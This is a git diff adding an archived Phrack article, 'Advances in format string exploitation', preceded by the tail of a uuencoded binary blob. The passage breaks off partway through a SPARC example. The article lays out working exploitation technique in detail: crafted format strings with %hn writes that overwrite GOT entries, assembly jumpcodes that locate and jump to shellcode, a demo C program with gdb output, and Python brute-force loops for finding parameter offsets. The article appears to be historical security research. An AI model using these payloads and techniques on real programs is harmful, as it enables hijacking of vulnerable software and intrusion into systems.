+M<2ZHB]<]']&$^!-&-&%.U@$UL9R5I35(7W!W>%<Z)S]QF_.1NW)@:6X-'<;_
+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
+;9]9R2:D_/O<$]/ZY?^Z?O];S?S5<AR(`\```
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack59/7.txt b/phrack59/7.txt
new file mode 100644
index 0000000..82f6d57
--- /dev/null
+++ b/phrack59/7.txt
@@ -0,0 +1,1084 @@
+                             ==Phrack Inc.==
+
+                  0x0b, Issue 0x3b, Phile #0x07 of 0x12
+
+|=-------------=[ Advances in format string exploitation ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=|
+
+
+    1 - Intro
+
+    Part I 
+    2 - Bruteforcing format strings
+
+    3 - 32*32 == 32 - Using jumpcodes 
+      3.1 - write code in any known address
+      3.2 - the code is somewhere else
+      3.3 - friendly functions
+      3.4 - no weird addresses 
+
+    4 - n times faster
+      4.1 - multiple address overwrite
+      4.2 - multiple parameters bruteforcing
+
+    Part II
+    5 - Exploiting heap based format strings
+
+    6 - the SPARC stack
+    
+    7 - the trick
+      7.1 - example 1
+      7.2 - example 2
+      7.3 - example 3
+      7.4 - example 4
+
+    8 - building the 4-bytes-write-anything-anywhere primitive
+      8.1 - example 5
+
+    9 - the i386 stack
+      9.1 - example 6
+      9.2 - example 7 - the pointer generator
+
+    10 - conclusions
+      10.1 - is it dangerous to overwrite the l0 (on the stack frame) ?
+      10.2 - is it dangerous to overwrite the ebp (on the stack frame) ?
+      10.3 - is this reliable ?
+
+    The End
+    11 - more greets and thanks
+
+    12 - References
+
+--[ 1. Intro
+
+   Is there anything else to say about format strings after all this time?
+ probably yes, or at least we are trying... To start with, go get scut's
+ excellent paper on format strings [1] and read it.
+
+   This text deals with 2 different subjects. The first is about different
+ tiny tricks that may help speeding up bruteforcing when exploiting format
+ strings bugs, and the second is about exploting heap based format strings
+ bugs.
+
+   So fasten your seatbelts, the trip has just begun.
+
+
+--[ Part I - by gera
+--[ 2. Bruteforcing format strings
+
+        "...Bruteforcing is not a very happy term, and doesn't make
+        justice for a lot of exploit writers, as most of the time a
+        lot of brain power is used to solve the problem in better
+        ways than just brute force..."
+
+    My greets to all those artists who inspired this phrase, specially
+ ~{MaXX,dvorak,Scrippie}, scut[], lg(zip) and lorian+k.
+
+--[ 3. 32*32 == 32 - Using jumpcodes 
+
+    Ok, first things first...
+
+    A format string lets you, after dealing with it, write what you want
+where you want... I like to call this a write-anything-anywhere primitive,
+and the trick described here can be used whenever you have a
+write-anything-anywhere primitive, be it a format string, an overflow over
+the "destination pointer of a strcpy()", several free()s in a row, a
+ret2memcpy buffer overflow, etc.
+
+    Scut[1], shock[2], and others[3][4] explain several methods to hook the
+execution flow using a write-anything-anywhere primitive, namely changing
+GOT, changing some function pointer, atexit() handlers, erm... a virtual
+member of a class, etc.  When you do so, you need to know, guess or predict
+2 different addresses: function pointer's address and shellcode's address,
+each has 32 bits, and if you go blindly bruteforcing, you'll need to get 64
+bits... well, this is not true, suppose GOT's address always starts with,
+mmm... 0x0804 and that your code will be in, erm... 0x0805... ok, for linux
+this may even be true, so it's not 64 bits, but 32 total, so it's just
+4,294,967,296 tries...  well, no, because you may be able to provide a
+cushion of 4K nops, so it goes down to 1,048,576 tries, and as GOT must be
+walked on 4 bytes steps, it's just 262,144... heh, all theese numbers are
+just... erm... nonsense.
+
+    Well, sometimes there are other tricks you can do, use a read primitive
+to learn something from the target process, or turn a write primitive into
+a read primitive, or use more nops, or target stack or just hardcode some
+addresses and go happy with it...
+
+    But, there is something else you can do, as you are not limited to
+writing only 4 bytes, you can write more than the address to the shellcode,
+you can also write the shellcode!
+
+----[ 3.1. write code in any known address
+
+    Even with a single format string bug you can write not only more than
+4, bytes, but you can also write them to different places in memory, so you
+can choose any known to be writable and executable address, lets say,
+0x8051234 (for some target program running on some linux), write some code
+there, and change the function pointer (GOT, atexit()'s functions, etc) to
+point it:
+
+
+               GOT[read]:     0x8051234     ; of course using read is just
+                                            ; an example
+
+               0x8051234:     shellcode
+
+    What's the difference? Well... shellcode's address is now known, it's
+always 0x8051234, hence you only have to bruteforce function pointer's
+address, cutting down the number of bits to 15 in the worst case.
+
+    Ok, right, you got me... you cannot write a 200 bytes shellcode using
+this technique with a format string (or can you?), maybe you can write a
+30 bytes shellcode, but maybe you only have a few bytes... so, we need a
+really small jumpcode for this to work.
+
+----[ 3.2. the code is somewhere else
+
+    I'm pretty sure you'll be able to put the code somewhere in target's
+memory, in stack or in heap, or somewhere else (!?). If this is the case,
+we need our jumpcode to locate the shellcode and jump there, what could
+be really easy, or a little more tricky.
+
+    If the shellcode is somewhere in stack (in the same format string
+perhaps?) and if you can, more or less, know how far from the SP it will be
+when the jumpcode is executed, you can jump relative to the SP with just 8
+or 5 bytes:
+
+
+              GOT[read]:      0x8051234
+
+              0x8051234:      add $0x200, %esp   ; delta from SP to code
+                              jmp *%esp          ; just use esp if you can
+
+              esp+0x200:      nops...            ; just in case delta is
+                                                 ; not really constant
+                              real shellcode     ; this is not writen using
+                                                 ; the format string
+
+    Is the code in heap?, but you don't have the slightest idea where it
+is? Just follow Kato (this version is 18 bytes, Kato's version is a little
+longer, but only made of letters, he didn't use a format string though):
+
+              GOT[read]:      0x8051234
+
+              0x8051234:      cld
+                              mov $0x4f54414a,%eax   ; so it doesn find
+                              inc %eax               ; itself (tx juliano)
+                              mov $0x804fff0, %edi   ; start searching low
+                                                     ; in memory
+                              repne scasl
+                              jcxz .-2               ; keep searching!
+                              jmp *$edi              ; upper case letters
+                                                     ; are ok opcodes.
+
+              somewhere
+                in heap:      'KATO'            ; if you know the alignment
+                              'KKATO'           ; one is enough, otherwise
+                              'KKATO'           ; make some be found
+                              'KKATO'
+                              real shellcode
+                                
+    Is it in stack but you don't know where? (10 bytes)
+
+              GOT[read]:      0x8051234
+
+              0x8051234:      mov $0x4f54414a,%ebx   ; so it doesn find
+                              inc %ebx               ; itself (tx juliano)
+                              pop %eax
+                              cmp %ebx, %eax
+                              jnz .-3
+                              jmp *$esp
+
+              somewhere
+               in stack:      'KATO'            ; you'll know the alignment
+                              real shellcode
+
+    Something else? ok, you figure your jumpcode yourself :-) But be
+carefull!  'KATO' may not be a good string, as it's executed and has some
+side effect. :-)
+    You may even use a jumpcode which copies from stack to heap if the
+stack is not executable but the heap is.
+
+----[ 3.3. friendly functions
+
+    When changing GOT you can choose what function pointer you want to use,
+some functions may be better than others for some targets. For example, if
+you know that after you changed the function pointer, the buffer containing
+the shellcode will be free()ed, you can just do: (2 bytes)
+
+              GOT[free]:      0x8051234          ; using free this time
+
+              0x8051234:      pop %eax           ; discarding real ret addr
+                              ret                ; jump to free's argument    
+ 
+    The same may happen with read() if the same buffer with the shellcode
+is reused to read more from the net, or syslog() or a lot of other
+functions...  Sometimes you may need a jumpcode a little more complex if
+you need to skip some bytes at the beggining of the shellcode:
+(7 or 10 bytes)
+
+              GOT[syslog]:    0x8051234          ; using syslog
+
+              0x8051234:      pop %eax           ; discarding real ret addr
+                              pop %eax
+                              add $0x50, %eax    ; skip some non-code bytes
+                              jmp *$eax
+
+    And if nothing else works, but you can distinguish between a crash and
+a hung, you can use a jumpcode with an infinite loop that will make the
+target hung: You bruteforce GOT's address until the server hungs, then you
+know you have the right address for some GOT entry that works, and you can
+start bruteforcing the address for the real shellcode.
+
+              GOT[exit]:      0x8051234
+
+              0x8051234:      jmp .              ; infinite loop
+
+----[ 3.4. no weird addresses 
+
+    As I don't like choosing arbitrary addresses, like 0x8051234, what we
+can do is something a little different:
+
+              GOT[free]:      &GOT[free]+4       ; point it to next 4 bytes
+                              jumpcode           ; address is &GOT[free]+4
+
+    You don't really know GOT[free]'s address, but on every bruteforcing
+step you are assuming you know it, then, you can make it point 4 bytes
+ahead of it, where you can place the jumpcode, i.e. if you assume your
+GOT[free] is at 0x8049094, your jumpcode will be at 0x8049098, then, you
+have to write the value 0x8049098 to the address 0x8049094 and the
+jumpcode to 0x8049098:
+
+  /* fs1.c                                                   *
+   * demo program to show format strings techinques          *
+   * specially crafted to feed your brain by gera@corest.com */
+
+  int main() {
+    char buf[1000];
+
+    strcpy(buf,
+      "\x94\x90\x04\x08"          // GOT[free]'s address
+      "\x96\x90\x04\x08"          // 
+      "\x98\x90\x04\x08"          // jumpcode address (2 byte for the demo)
+      "%.37004u"                  // complete to 0x9098 (0x9098-3*4)
+      "%8$hn"                     // write 0x9098 to 0x8049094
+      "%.30572u"                  // complete to 0x10804 (0x10804-0x9098)
+      "%9$hn"                     // write 0x0804 to 0x8049096
+      "%.47956u"                  // complete to 0x1c358 (0x1c358-0x10804)
+      "%10$hn"                    // write 5B C3 (pop - ret) to 0x8049098
+          );
+
+    printf(buf);
+  }
+
+  gera@vaiolent:~/papers/gera$ make fs1
+  cc     fs1.c   -o fs1
+
+  gera@vaiolent:~/papers/gera$ gdb fs1
+  
+  (gdb) br main
+  Breakpoint 1 at 0x8048439
+
+  (gdb) r
+  Breakpoint 1, 0x08048439 in main ()
+
+  (gdb) n
+  ...0000000000000...
+
+  (gdb) x/x 0x8049094
+  0x8049094:    0x08049098
+
+  (gdb) x/2i 0x8049098
+  0x8049098:    pop    %eax
+  0x8049099:    ret    
+
+    So, if the address of the GOT entry for free() is 0x8049094, the next
+time free() is called in the program our little jumpcode will be called
+instead.
+
+    This last method has another advantage, it can be used not only on
+format strings, where you can make every write to a different address, but
+it can also be used with any write-anything-anywhere primitive, like a
+"destination pointer of strcpy()" overwrite, or a ret2memcpy buffer
+overflow. Or if you are as lucky [or clever] as lorian, you may even do
+it with a single free() bug, as he teached me to do.
+
+--[ 4. n times faster
+
+----[ 4.1. multiple address overwrite
+
+    If you can write more than 4 bytes, you can not only put the shellcode
+or jumpcode where you know it is, you can also change several pointers at
+the same time, speeding up things again.
+
+    Of course this can be done, again, with any write-anything-anywhere
+primitive which let's you write more than just 4 bytes, and, as we are
+going to write the same values to all the pointers, there is a cheap way to
+do it with format strings.
+
+    Suppose we are using the following format string to write 0x12345678 at
+the address 0x08049094:
+
+    "\x94\x90\x04\x08"          // the address to write the first 2 bytes
+    "AAAA"                      // space for 2nd %.u
+    "\x96\x90\x04\x08"          // the address for the next 2 bytes
+    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
+    "%.22076u"                  // complete to 0x5678 (0x5678-4-4-4-6*8)
+    "%hn"                       // write 0x5678 to 0x8049094
+    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
+    "%hn"                       // write 0x1234 to 0x8049096
+
+    As %hn does not add characters to the output string, we can write the
+same value to several locations without having to add more padding. For
+example, to turn this format string into one that writes the value
+0x12345678 to 5 consecutive words starting in 0x8049094 we can use:
+
+    "\x94\x90\x04\x08"          // addresses where to write 0x5678
+    "\x98\x90\x04\x08"          // 
+    "\x9c\x90\x04\x08"          //
+    "\xa0\x90\x04\x08"          //
+    "\xa4\x90\x04\x08"          //
+    "AAAA"                      // space for 2nd %.u
+    "\x96\x90\x04\x08"          // addresses for 0x1234
+    "\x9a\x90\x04\x08"          //
+    "\x9e\x90\x04\x08"          //
+    "\xa2\x90\x04\x08"          //
+    "\xa6\x90\x04\x08"          //
+    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
+    "%.22044u"                  // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
+    "%hn"                       // write 0x5678 to 0x8049094
+    "%hn"                       // write 0x5678 to 0x8049098
+    "%hn"                       // write 0x5678 to 0x804909c
+    "%hn"                       // write 0x5678 to 0x80490a0
+    "%hn"                       // write 0x5678 to 0x80490a4
+    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
+    "%hn"                       // write 0x1234 to 0x8049096
+    "%hn"                       // write 0x1234 to 0x804909a
+    "%hn"                       // write 0x1234 to 0x804909e
+    "%hn"                       // write 0x1234 to 0x80490a2
+    "%hn"                       // write 0x1234 to 0x80490a6
+
+    Or the equivalent using direct parameter access.
+
+    "\x94\x90\x04\x08"          // addresses where to write 0x5678
+    "\x98\x90\x04\x08"          // 
+    "\x9c\x90\x04\x08"          //
+    "\xa0\x90\x04\x08"          //
+    "\xa4\x90\x04\x08"          //
+    "\x96\x90\x04\x08"          // addresses for 0x1234
+    "\x9a\x90\x04\x08"          //
+    "\x9e\x90\x04\x08"          //
+    "\xa2\x90\x04\x08"          //
+    "\xa6\x90\x04\x08"          //
+    "%.22096u"                  // complete to 0x5678 (0x5678-5*4-5*4)
+    "%8$hn"                     // write 0x5678 to 0x8049094
+    "%9$hn"                     // write 0x5678 to 0x8049098
+    "%10$hn"                    // write 0x5678 to 0x804909c
+    "%11$hn"                    // write 0x5678 to 0x80490a0
+    "%12$hn"                    // write 0x5678 to 0x80490a4
+    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
+    "%13$hn"                    // write 0x1234 to 0x8049096
+    "%14$hn"                    // write 0x1234 to 0x804909a
+    "%15$hn"                    // write 0x1234 to 0x804909e
+    "%16$hn"                    // write 0x1234 to 0x80490a2
+    "%17$hn"                    // write 0x1234 to 0x80490a6
+
+    In this example, the number of "function pointers" to write at the same
+time was set arbitrary to 5, but it could have been another number. The
+real limit depends on the length of the string you can supply, how many
+arguments you need to pop to get to the addresses if you are not using
+direct parameter access, if there is a limit for direct parameters access
+(on Solaris' libraries it's 30, on some Linuxes it's 400, and there may be
+other variations), etc.
+
+    If you are going to combine a jumpcode with multiple address overwrite,
+you need to have in mind that the jumpcode will not be just 4 bytes after
+the function pointer, but some more, depending on how many addresses you'll
+overwrite at once.
+
+----[ 4.2. multiple parameter bruteforcing
+
+    Sometimes you don't know how many parameters you have to pop, or how
+many to skip with direct parameter access, and you need to try until you
+hit the right number. Sometimes it's possible to do it in a more
+inteligent way, specially when it's not a blind format string (did I say
+it already? go read scut's paper [1]!). But anyway, there may be cases
+when you don't know how many parameters to skip, and have to find it out
+trying, as in the next pythonish example:
+
+    pops = 8
+    worked = 0
+    while (not worked):
+      fstring  = "\x94\x90\x04\x08"        # GOT[free]'s address
+      fstring += "\x96\x90\x04\x08"        # 
+      fstring += "\x98\x90\x04\x08"        # jumpcode address
+      fstring += "%.37004u"                # complete to 0x9098
+      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
+      fstring += "%.30572u"                # complete to 0x10804
+      fstring += "%%%d$hn" % (pops+1)      # write 0x0804 to 0x8049096
+      fstring += "%.47956u"                # complete to 0x1c358
+      fstring += "%%%d$hn" % (pops+2)      # write (pop - ret) to 0x8049098
+      worked = try_with(fstring)
+      pops += 1
+
+    In this example, the variable 'pops' is incremented while trying to
+hit the right number for direct parameter access. If we repeat the target
+addresses, we can build a format string which lets us increment 'pops'
+faster. For example, repeating each address 5 times we get a faster
+bruteforcing:
+
+    pops = 8
+    worked = 0
+    while (not worked):
+      fstring  = "\x94\x90\x04\x08" * 5    # GOT[free]'s address
+      fstring += "\x96\x90\x04\x08" * 5    # repeat eddress 5 times
+      fstring += "\x98\x90\x04\x08" * 5    # jumpcode address
+      fstring += "%.37004u"                # complete to 0x9098
+      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
+      fstring += "%.30572u"                # complete to 0x10804
+      fstring += "%%%d$hn" % (pops+6)      # write 0x0804 to 0x8049096
+      fstring += "%.47956u"                # complete to 0x1c358
+      fstring += "%%%d$hn" % (pops+11)     # write (pop - ret) to 0x8049098
+      worked = try_with(fstring)
+      pops += 5
+
+    Hitting any of the 5 copies well be ok, the most copies you can put
+the better.
+    
+    This is a simple idea, just repeat the addresses. If it's confusing,
+grab pen and paper and make some drawings, first draw a stack with the
+format string in it, and some random number of arguments on top of it, and
+then start doing the bruteforcing manually... it'll be fun! I guarantee
+it! :-)
+    
+    It may look stupid but may help you some day, you never know... and of
+course the same could be done without direct parameter access, but it's a
+little more complicated as you have to recalculate the length for %.u
+format specifiers on every try.
+
+--[ unnamed and unlisted seccion
+
+    Through this text my only point was: a format string is more than a
+mere 4-bytes-write-anything-anywhere primitive, it's almost a full
+write-anything-anywhre primitive, which gives you more posibilities.
+
+    So far so good, the rest is up to you...
+
+
+--[ Part II - by riq
+--[ 5. Exploiting heap based format strings
+
+  Usually the format strings lies on the stack. But there are cases where
+it is stored on the heap, and you CAN'T see it.
+
+  Here I present a way to deal with these format strings in a generic way
+within SPARC (and big-endian machines), and at the end we'll show you how
+to do the same for little-endian machines.
+
+--[ 6. The SPARC stack
+
+  In the stack you will find stack frames. These stack frames have local 
+variables, registers, pointers to previous stack frames, return addresses,
+etc.
+
+  Since with format strings we can see the stack, we are going to study
+it more carefully.
+
+  The stack frames in SPARC looks more or less like the following:
+
+
+          frame 0              frame 1               frame 2
+         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
+         [  l1   ]     |      [  l1   ]      |      [  l1   ]
+            ...        |         ...         |         ...   
+         [  l7   ]     |      [  l7   ]      |      [  l7   ]
+         [  i0   ]     |      [  i0   ]      |      [  i0   ]
+         [  i1   ]     |      [  i1   ]      |      [  i1   ]
+            ...        |         ...         |         ...   
+         [  i5   ]     |      [  i5   ]      |      [  i5   ]
+         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
+         [  i7   ]            [  i7   ]             [  i7   ]
+         [ temp 1]            [ temp 1]
+                              [ temp 2]
+
+  And so on...
+
+  The fp register is a pointer to the caller frame pointer. As you may
+guess, 'fp' means frame pointer.  
+
+  The temp_N are local variables that are saved in the stack. The frame 1
+starts where the frame 0's local variables end, and the frame 2 starts,
+where the frame 1's local variables end, and so on.
+
+  All these frames are stored in the stack. So we can see all of these
+stack frames with our format strings.
+
+
+--[ 7. the trick
+
+  The trick lies in the fact that every stack frame has a pointer to the
+previous stack frame. Furthermore, the more pointers to the stack we have,
+the better.
+
+  Why ? Because if we have a pointer to our own stack, we can overwrite the
+address that it points to with any value.
+
+
+--[ 7.1. example 1
+
+ Suppose that we want to put the value 0x1234 in frame 1's l0. What we will
+try to do is to build a format string, whose length is 0x1234, by the time
+we've reached stack frame 0's fp with a %n.
+
+  Supposing that the first argument that we see is the frame 0's l0
+register, we should have a format string like the following (in python):
+
+  '%8x' * 8 +     # pop the 8 registers 'l'
+  '%8x' * 5 +     # pop the first 5 'i' registers
+  '%4640d'  +     # modify the length of my string (4640 is 0x1220) and...
+  '%n'            # I write where fp is pointing (which is frame 1's l0)
+
+
+  So, after the format string has been executed, our stack should look like
+this:
+
+          frame 0              frame 1 
+         [  l0   ]     +----> [ 0x00001234 ]
+         [  l1   ]     |      [  l1   ]
+            ...        |         ...   
+         [  l7   ]     |      [  l7   ]
+         [  i0   ]     |      [  i0   ]
+         [  i1   ]     |      [  i1   ]
+            ...        |         ...   
+         [  i5   ]     |      [  i5   ]
+         [  fp   ] ----+      [  fp   ]
+         [  i7   ]            [  i7   ]
+         [ temp 1]            [ temp 1]
+                              [ temp 2]
+
+
+--[ 7.2. example 2
+
+  If we decided on a bigger number, like 0x20001234, we should find 2
+pointers that point to the same address in the stack. It should be
+something like this:
+
+          frame 0              frame 1 
+         [  l0   ]     +----> [  l0   ]
+         [  l1   ]     |      [  l1   ]
+            ...        |         ...   
+         [  l7   ]     |      [  l7   ]
+         [  i0   ]     |      [  i0   ]
+         [  i1   ]     |      [  i1   ]
+            ...        |         ...   
+         [  i5   ]     |      [  i5   ]
+         [  fp   ] ----+      [  fp   ]
+         [  i7   ]     |      [  i7   ]
+         [ temp 1] ----+      [ temp 1]
+                              [ temp 2]
+
+  [ Note: We are not going to find always 2 pointers that point to the same
+address, though it is not rare. ]
+
+  So, our format string should look like this:
+
+  '%8x' * 8 +     # pop the 8 registers 'l'
+  '%8x' * 5 +     # pop the first 5 registers 'i'
+  '%4640d'  +     # modify the length of my format string (4640 is 0x1220)
+  '%n'            # I write where fp is pointing (which is frame 1's l0)
+  '%3530d'  +     # again, I modify the length of the format string
+  '%hn'           # and I write again, but only the hi part this time!
+
+  And we would get the following:
+          frame 0              frame 1 
+         [  l0   ]     +----> [ 0x20001234 ]
+         [  l1   ]     |      [  l1   ]
